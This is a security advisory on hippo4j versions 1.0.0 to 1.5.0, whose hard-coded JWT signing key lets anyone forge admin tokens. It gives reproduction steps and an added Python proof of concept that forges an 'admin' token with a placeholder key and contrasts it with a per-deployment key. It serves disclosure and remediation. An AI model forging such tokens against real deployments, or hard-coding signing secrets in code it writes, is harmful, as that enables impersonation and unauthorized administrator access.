hippo4j
cpe:2.3:a:opengoofy:hippo4j:*:*:*:*:*:*:*
- >= 1.0.0, <= 1.5.0
A vulnerability exists in hippo4j versions 1.0.0 through 1.5.0: the secret key used to sign JSON Web Tokens (JWTs) is hard-coded in the application. Anyone who can read the source code or decompile the shipped binary recovers that key and can mint tokens that the server accepts as genuine, so they can impersonate any user, including accounts with privileged roles such as 'admin'. The issue is critical wherever the JWT is the only thing standing between a request and an authenticated, authorized action, because every deployment of an affected version shares the same key.
Exploitation consists of forging a JWT with the known key. No credentials are needed; the attacker chooses the user and role claims, signs with the hard-coded secret, and the server treats the token as if it had issued it, granting unauthorized access up to and including administrator privileges.
To reproduce the issue, first obtain a legitimate access token by sending a POST request with a valid username and password to the authentication endpoint; this token shows the header (signing algorithm) and the claim layout the server expects. Next, inspect the application's JWT handling code and confirm that the signing key is a constant rather than a value loaded from configuration or generated at deployment. Then use that key to sign a token whose claims name the 'admin' user. Finally, send a request to the user information endpoint with the forged token in place of the real one; a successful response for 'admin' confirms the impersonation.
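The following is an added example, not code from the hippo4j project or from the original advisory. It models the reproduction steps above in Python using only the standard library: decode a captured token to learn its layout, forge an HS256 token for 'admin' with the hard-coded key, and show that a server which verifies with that same key accepts it while a server verifying with a per-deployment key rejects it. The key value, the claim names (sub, role) and the helper names are placeholders chosen for the example; the real hippo4j key and claim layout are not reproduced here.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets
import time
from typing import Optional, Tuple

# Placeholder standing in for the constant found in the affected versions
# (assumed value for this example, not the project's real key).
HARDCODED_SECRET = "example-hardcoded-secret-recovered-from-source"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: str) -> str:
    """Build a compact HS256 JWT (header.payload.signature) over the given claims."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = "{}.{}".format(
        _b64url(json.dumps(header, separators=(",", ":")).encode()),
        _b64url(json.dumps(claims, separators=(",", ":")).encode()),
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Step 1/2 of the reproduction: read header and claims of a captured token
    without checking the signature, to learn the algorithm and claim layout."""
    h, p, _ = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p))


def verify_jwt(token: str, secret: str, now: Optional[int] = None) -> Optional[dict]:
    """Server-side check: constant-time HMAC comparison, alg pinned to HS256,
    exp enforced. Returns the claims on success, None on any failure."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        return None
    claims = json.loads(_b64url_decode(p))
    now = int(time.time()) if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        return None
    return claims


def forge_admin_token(secret: str = HARDCODED_SECRET, lifetime: int = 3600,
                      now: Optional[int] = None) -> str:
    """Step 3: mint a token for 'admin' using the recovered key.
    Claim names are assumed for the example."""
    now = int(time.time()) if now is None else now
    claims = {"sub": "admin", "role": "ROLE_ADMIN", "iat": now, "exp": now + lifetime}
    return sign_jwt(claims, secret)


def vulnerable_server_user(token: str) -> Optional[str]:
    """Models the affected behaviour: every deployment verifies with the same constant."""
    claims = verify_jwt(token, HARDCODED_SECRET)
    return claims["sub"] if claims else None


def deployment_secret() -> str:
    """Hardened alternative: key comes from the environment (assumed variable
    name JWT_SECRET) or is generated once per process, never from source."""
    return os.environ.get("JWT_SECRET") or secrets.token_urlsafe(32)


_PER_DEPLOYMENT_SECRET = deployment_secret()


def hardened_server_user(token: str) -> Optional[str]:
    claims = verify_jwt(token, _PER_DEPLOYMENT_SECRET)
    return claims["sub"] if claims else None


if __name__ == "__main__":
    legit = sign_jwt({"sub": "alice", "role": "ROLE_USER"}, HARDCODED_SECRET)
    print("captured token layout:", decode_unverified(legit))
    forged = forge_admin_token()
    print("vulnerable server sees:", vulnerable_server_user(forged))
    print("hardened server sees:", hardened_server_user(forged))
```

The vulnerable path accepts the forged token because the attacker and the server hold the same constant; the hardened path rejects it because the attacker never learns a key that exists only in the deployment's environment. Rotating that key also invalidates every token issued under the old one, which is the remediation step an operator wants after upgrading.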